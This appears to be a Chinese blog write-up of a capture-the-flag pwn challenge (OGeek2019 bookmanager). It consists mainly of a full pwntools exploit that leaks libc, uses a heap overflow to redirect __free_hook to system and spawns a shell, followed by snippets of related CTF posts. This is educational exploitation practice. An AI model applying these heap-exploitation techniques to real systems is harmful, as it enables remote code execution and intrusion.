做过的代码量最大的一个题

说出的好也好,不好也不好,利用点很简单,就是一个大规模的heapoverflow,就是逆起来有点儿难度

思路很简单,就是利用堆溢出覆盖结构体中的指针为__free_hook,然后改freehook

给整吐了,做了俩小时,然后本地到了最后一步,freehook每次内容都是一个奇怪的值,就是改不了system,然后远程一打就通了-.-||

 1 from pwn import *

 2

 3 local = 0

 4

 5 binary = "./pwn"

 6

 7 if local == 1:

 8     p = process(binary)

 9 else:

10     p = remote("node3.buuoj.cn",27329)

11

12 def dbg():

13     context.log_level = 'debug'

14

15 context.terminal = ['tmux','splitw','-h']

16

17 def create_book(name):

18     p.sendafter('Name of the book you want to create:',name)

19

20 def add_chapter(name):

21     p.sendlineafter('Your choice:','1')

22     p.sendafter('Chapter name:',name)

23

24 def add_section(chapter_name,name):

25     p.sendlineafter('Your choice:','2')

26     p.sendafter('Which chapter do you want to add into:',chapter_name)

27     p.sendafter('Section name:',name)

28

29 def add_text(section_name,size,name):

30     p.sendlineafter('Your choice:','3')

31     p.sendafter('Which section do you want to add into:',section_name)

32     p.sendafter('How many chapters you want to write:',str(size))

33     p.sendafter('Text:',name)

34

35 def remove_chapter(chapter_name):

36     p.sendlineafter('Your choice:','4')

37     p.sendafter('Chapter name:',chapter_name)

38

39 def remove_section(section_name):

40     p.sendlineafter('Your choice:','5')

41     p.sendafter('Section name:',section_name)

42

43 def remove_text(section_name):

44     p.sendlineafter('Your choice:','6')

45     p.sendafter('Section name:',section_name)

46

47 def show():

48     p.sendlineafter('Your choice:','7')

49

50 def edit_text(sectionname,newname):

51     p.sendlineafter('Your choice:','8')

52     p.sendlineafter('What to update?(Chapter/Section/Text):','Text')

53     p.sendafter('Section name:',sectionname)

54     p.sendafter('New Text:',newname)

55

56 def edit_section(old_sectionname,newname):

57     p.sendlineafter('Your choice:','8')

58     p.sendlineafter('What to update?(Chapter/Section/Text):','Section')

59     p.sendafter('Section name:',old_sectionname)

60     p.sendafter('New Section name:',newname)

61

62 libc = ELF('./libc-2.23.so')

63

64 create_book('lemon')

65

66 print "==== step1: leak libc ===="

67 add_chapter('one')

68 add_section('one','c' * 8)

69 add_text('c' * 8,0x80,'d' * 8)

70

71 add_chapter('\x01')

72

73 remove_text('cccccccc')

74 add_text('cccccccc',0x80,'aaaaaaaa')

75 show()

76 __malloc_hook = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 88 - 0x10

77 libc_base = __malloc_hook - libc.sym['__malloc_hook']

78 __free_hook = libc_base + libc.sym['__free_hook']

79 system = libc_base + libc.sym['system']

80 print "libc base: ",hex(libc_base)

81

82 print "==== step2: heapoverflow make heap pointer to free hook ===="

83 add_text('cccccccc',0x10,'\x01')

84 payload = '/bin/sh\x00' + 'a' * 8 + p64(0) + p64(0x41) + 'dddddddd' + p64(0) * 3 + p64(__free_hook)

85 add_section('one','dddddddd')

86 #dbg()

87 edit_text('cccccccc',payload)

88 edit_text('dddddddd',p64(system))

89 remove_text('cccccccc')

90

91 #gdb.attach(p)

92 p.interactive()

[OGeek2019]bookmanager的更多相关文章

  1. execution(* *..BookManager.save(..))的解读

    execution(* *..BookManager.save(..))的解读: 第一颗* 代表ret-type-pattern 返回值可任意, *..BookManager 代表任意Pacakge里 ...

  2. [BUUCTF]PWN7——[OGeek2019]babyrop

    [BUUCTF]PWN7--[OGeek2019]babyrop 题目网址:https://buuoj.cn/challenges#[OGeek2019]babyrop 步骤: 例行检查,32位,开启 ...

  3. buuctf@[OGeek2019]babyrop

    #!/usr/bin/python #coding:utf-8 from pwn import * #context.log_level = 'debug' io = process('./pwn', ...

  4. 张高兴的 UWP 开发笔记:横向 ListView

    ListView 默认的排列方向是纵向 ( Orientation="Vertical" ) ,但如果我们需要横向显示的 ListView 怎么办? Blend for Visua ...

  5. AIDL使用解析

    简书本文地址:点击跳转到简书查看 之前面试的时候被问到这个问题,然而当时只有一个大致的印象,随GG,于是我就重新整理的一下.这里大力推荐<Android开发艺术探索>这本书,写的太好了! ...

  6. Android 进程通信机制之 AIDL

    什么是 AIDL AIDL 全称 Android Interface Definition Language,即 安卓接口描述语言.听起来很深奥,其实它的本质就是生成进程间通信接口的辅助工具.它的存在 ...

  7. 设计模式之美:Manager(管理器)

    索引 意图 结构 参与者 适用性 效果 实现 实现方式(一):Manager 模式的示例实现. 意图 将对一个类的所有对象的管理封装到一个单独的管理器类中. 这使得管理职责的变化独立于类本身,并且管理 ...

  8. Lucene.net站内搜索—6、站内搜索第二版

    目录 Lucene.net站内搜索—1.SEO优化 Lucene.net站内搜索—2.Lucene.Net简介和分词Lucene.net站内搜索—3.最简单搜索引擎代码Lucene.net站内搜索—4 ...

  9. 轻松掌握:JavaScript享元模式

    享元模式 在JavaScript中,浏览器特别是移动端的浏览器分配的内存很有限,如何节省内存就成了一件非常有意义的事情.节省内存的一个有效方法是减少对象的数量. 享元模式(Flyweight),运行共 ...

随机推荐

  1. 【性能优化】面试官:Java中的对象都是在堆上分配的吗?

    写在前面 从开始学习Java的时候,我们就接触了这样一种观点:Java中的对象是在堆上创建的,对象的引用是放在栈里的,那这个观点就真的是正确的吗?如果是正确的,那么,面试官为啥会问:"Jav ...

  2. 企业面试中关于MYSQL重点的28道面试题解答

      问题1:char.varchar的区别是什么? varchar是变长而char的长度是固定的.如果你的内容是固定大小的,你会得到更好的性能. 问题2: TRUNCATE和DELETE的区别是什么? ...

  3. 刷题[SUCTF 2018]GetShell

    解题思路 进入upload,发现有源码,代码审计 代码审计 大概意思就是,读取我们上传的文件,截取第五位之后的内容,与黑名单不匹配才能上传成功 我传的是一个空的txt文件,发现会变成php文件,那好办 ...

  4. package.json 非官方字段集合

    package.json 非官方字段集合 package.json 官方字段请参考 https://docs.npmjs.com/files/package.json.下面介绍的是非官方字段,也就是各 ...

  5. Centos-归档文件或目录-tar

    tar 对文件或者目录进行打包归档成一个文件,不是压缩 相关选项 -c 新建文件 -r 将目标文件追加都档案文件末尾 -t 列出归档文件中已经归档文件列表 -x 从归档文件中还原文件 -u 新文件更新 ...

  6. Centos-bzip2压缩文件-bzip2 bunzip2

    bzip2 buzip2 对文件进行压缩与解压缩,类似 gzip gunzip命令,只能压缩文件,对目录则压缩目录下文件,生成以 .bz2为扩展名的文件 相关选项 -d 解压 -v 压缩或解压显示详细 ...

  7. 第一个随笔 Just For Test, Nothing Else

    第一个随笔 Just For Test, Nothing Else 注册了第一个博客,希望以后能添加点什么吧

  8. JS实现动态显示时间(最简单方法)

    使用JS实现动态显示时间 最简单实现方法 直接在网页适当的位置中插入如下js代码,(id="datetime") 不可省略. <div id="datetime&q ...

  9. 090 01 Android 零基础入门 02 Java面向对象 02 Java封装 01 封装的实现 03 # 088 01 Android 零基础入门 02 Java面向对象 02 Java封装 01 封装的实现 04 使用包进行类管理(2)——导入包

    090 01 Android 零基础入门 02 Java面向对象 02 Java封装 01 封装的实现 03 # 088 01 Android 零基础入门 02 Java面向对象 02 Java封装 ...

  10. 074 01 Android 零基础入门 01 Java基础语法 09 综合案例-数组移位 06 综合案例-数组移位-主方法功能3的实现

    074 01 Android 零基础入门 01 Java基础语法 09 综合案例-数组移位 06 综合案例-数组移位-主方法功能3的实现 本文知识点:综合案例-数组移位-主方法功能3的实现 说明:因为 ...